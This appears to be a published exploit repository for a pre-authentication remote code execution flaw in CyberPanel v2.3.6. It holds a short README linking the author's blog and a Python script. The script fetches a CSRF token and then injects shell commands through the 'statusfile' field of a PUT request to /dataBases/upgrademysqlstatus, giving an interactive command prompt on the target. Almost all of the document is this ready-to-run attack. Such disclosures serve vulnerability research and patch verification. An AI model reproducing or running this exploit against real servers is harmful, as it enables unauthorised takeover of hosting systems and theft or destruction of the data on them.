├── README.md
└── cyberpanel-rce.py


/README.md:
--------------------------------------------------------------------------------
1 | # CyberPanel-RCE
2 | 
3 | Exploit for CyberPanel RCE found on v2.3.6
4 | 
5 | More information availabe on my blog: https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce
6 | 


--------------------------------------------------------------------------------
/cyberpanel-rce.py:
--------------------------------------------------------------------------------
 1 | import httpx 
 2 | import sys 
 3 | 
 4 | def get_CSRF_token(client):
 5 |     resp = client.get("/")
 6 |     
 7 |     return resp.cookies['csrftoken']
 8 |     
 9 | def pwn(client, CSRF_token, cmd):
10 |     headers = {
11 |         "X-CSRFToken": CSRF_token,
12 |         "Content-Type":"application/json",
13 |         "Referer": str(client.base_url)
14 |     }
15 |     
16 |     payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)
17 |     
18 |     return client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload).json()["requestStatus"]
19 |     
20 | def exploit(client, cmd):
21 |     CSRF_token = get_CSRF_token(client)
22 |     stdout = pwn(client, CSRF_token, cmd)
23 |     print(stdout)
24 |     
25 | if __name__ == "__main__":
26 |     target = sys.argv[1]
27 |     
28 |     client = httpx.Client(base_url=target, verify=False)
29 |     while True:
30 |         cmd = input("$> ")
31 | 
32 |         exploit(client, cmd)
33 | 


--------------------------------------------------------------------------------